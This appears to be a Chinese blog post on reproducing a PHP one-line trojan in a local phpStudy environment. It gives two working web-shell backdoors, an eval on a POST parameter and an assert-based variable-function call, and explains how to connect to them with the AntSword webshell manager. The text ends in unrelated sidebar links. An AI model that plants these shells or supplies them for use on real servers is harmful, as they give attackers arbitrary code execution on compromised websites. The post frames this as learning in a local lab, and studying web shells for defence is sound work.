当前位置:网站首页>复现php一句话木马
复现php一句话木马
2022-07-26 10:55:00 【熬夜且瞌睡】
在phpstudy-pro中,开启apache,MySQL,在WWW目录中创建php文件,在该php文件中进行代码的编写
<?php
eval($_POST['2']);
?>
打开中国蚁剑测试
输入测试的本地地址,连接密码输入2,编码格式选择base64,点击测试连接

当显示连接成功时,点击添加,双击添加的那条记录,看见网站 内容和目录结构,代表已经和成功了。

修改一下php文件
<?php
$_POST['1']($_POST['2']);
?>

eval的规则:eval是一个语言构造器,他不是一个函数,所以不能被可变函数进行调用。
使用assert;assert也可以执行任意命令,

显示连接成功 。
边栏推荐
- 雨课堂 《知识产权法》笔记
- Capture ZABBIX performance monitoring chart with selenium
- Relationship between pixels and memory
- 1748. Sum of unique elements
- pytest conftest.py和fixture的配合使用
- 经典蓝牙的连接过程
- @JsonFormat和@DateTimeFormat的区别和使用
- 35. Search the insertion position
- 3Dunity游戏项目实战——飞机大战
- 解决org.apache.commons.codec.binary.Base64爆红问题
猜你喜欢

Wechat official account message notice "errCode": 40164, "errmsg": "invalid IP

3Dunity游戏项目实战——飞机大战

3dunity game project practice - first person shooting game

nmap弱点扫描结果可视化转换

pytest conftest.py和fixture的配合使用

PyQt5快速开发与实战 第1章 认识PyQt5

Wireshark basic tutorial Ethernet frame analysis.

easyui01

新来个技术总监要我做一个 IP 属地功能~

Bash shell learning notes (4)
随机推荐
-bash: ./build.sh: /bin/bash^M: 坏的解释器: 没有那个文件或目录
mother
3Dunity游戏项目实战——飞机大战
静态路由和动态路由
MySQL quick learning notes-2021-08-31
@The real difference and usage between validated and @valid
104. Maximum depth of binary tree
Minesweeping Pro version 2021-08-19
菜鸟看源码之SparseArray
There is an unhandled exception at 0x003b66c3 in MFC: 0xc000041d: unhandled exception encountered during user callback
配置文件以rc结尾什么意思
easyui01
很多人都不清楚自己找的是Kanban软件还是看板软件
Sword finger offer (53): a string representing a numeric value
Connection between PLC and servo motor
Toolstrip border removal
Software Testing Overview: the background, essence and process of software testing
面试过程中,面试官是如何考察Rust工程师的水平?
实时流式协议--RTSP
Att request of ble